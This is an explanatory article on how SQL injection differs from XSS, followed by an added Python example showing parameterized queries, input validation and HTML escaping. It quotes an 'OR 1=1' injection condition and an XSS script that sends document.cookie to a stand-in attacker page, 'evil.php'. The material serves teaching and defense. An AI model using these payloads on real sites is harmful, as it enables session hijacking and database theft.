The main difference between SQL injection and XSS attacks is that SQL injection attacks are used to steal information from databases, whereas XSS attacks are used to redirect users to websites where attackers can steal data from them. SQL injection is database-focused, whereas XSS is geared towards attacking end users.
A SQL injection attack happens when Structured Query Language (SQL) code is injected into forms, cookies, or HTTP headers that do not use data sanitizing or validation methods to verify that information fits within prescribed GET or POST parameters. This flaw allows data exfiltration, changes, or deletion from databases that are connected to websites. According to the Open Web Application Security Project (OWASP), the five main techniques used in SQL injection attacks are union operator, boolean, error-based, out-of-band, and time delay. Here’s an example of possible SQL injection syntax that can be used to retrieve all customer account balances if not properly restricted on a website: SELECT balance FROM accounts WHERE account_owner_id = 0 OR 1=1. Because the condition 1=1 is always true, the WHERE clause matches every row in the table.
In contrast, an XSS attack uses malicious code to redirect users to malicious websites, steal cookies or credentials, or deface websites. This is usually accomplished using malicious scripts that are executed in client browsers as a result of user input, functional statements, client requests, or other expressions. For example, attackers can deliver maliciously crafted URLs via email phishing attempts, email attachments with embedded links, frames on legitimate websites, and web forums that are known to be frequently visited by targeted users. While SQL injection attacks target information in back-end databases, XSS attacks focus on stealing data from the website’s front end. According to OWASP, the following syntax can be used to perform an XSS attack to steal cookie data if input validation is not used:
<SCRIPT type="text/javascript">
// Builds a URL for the attacker's page with the visitor's cookies as a query parameter
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>
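
The following is an added example, not code from the original article or from OWASP. It runs the article's account-balance query against a constructed in-memory SQLite table, first with the input concatenated into the SQL text and then with a bound parameter, and shows input validation and HTML output encoding applied to the two payloads quoted above. The function names and sample rows are assumptions made for illustration; parameter binding and output encoding are standard defenses named here alongside the validation the article mentions.

```python
import html
import sqlite3

def make_db():
    # Constructed sample rows; table and column names follow the article's query.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (account_owner_id INTEGER, balance INTEGER)")
    db.executemany("INSERT INTO accounts VALUES (?, ?)", [(1, 100), (2, 250), (3, 75)])
    return db

def balances_concatenated(db, owner_id):
    # Weak form: the input becomes part of the SQL text, so "0 OR 1=1"
    # is parsed as an extra condition and every row matches.
    sql = "SELECT balance FROM accounts WHERE account_owner_id = " + owner_id
    return sorted(row[0] for row in db.execute(sql))

def balances_parameterized(db, owner_id):
    # Corrected form: the value is bound as data and is never parsed as SQL.
    sql = "SELECT balance FROM accounts WHERE account_owner_id = ?"
    return sorted(row[0] for row in db.execute(sql, (owner_id,)))

def validate_owner_id(raw):
    # Input validation: accept only ASCII decimal digits, reject anything else.
    if not (raw.isascii() and raw.isdigit()):
        raise ValueError("account_owner_id must be a decimal number")
    return int(raw)

def render_comment(text):
    # Output encoding: markup characters in user-supplied text become
    # entities, so a browser displays the text instead of running it.
    return "<p>" + html.escape(text, quote=True) + "</p>"

if __name__ == "__main__":
    db = make_db()
    hostile = "0 OR 1=1"  # the injected condition from the article
    print("concatenated: ", balances_concatenated(db, hostile))
    print("parameterized:", balances_parameterized(db, hostile))
    print("encoded:      ", render_comment('<SCRIPT type="text/javascript">'))
```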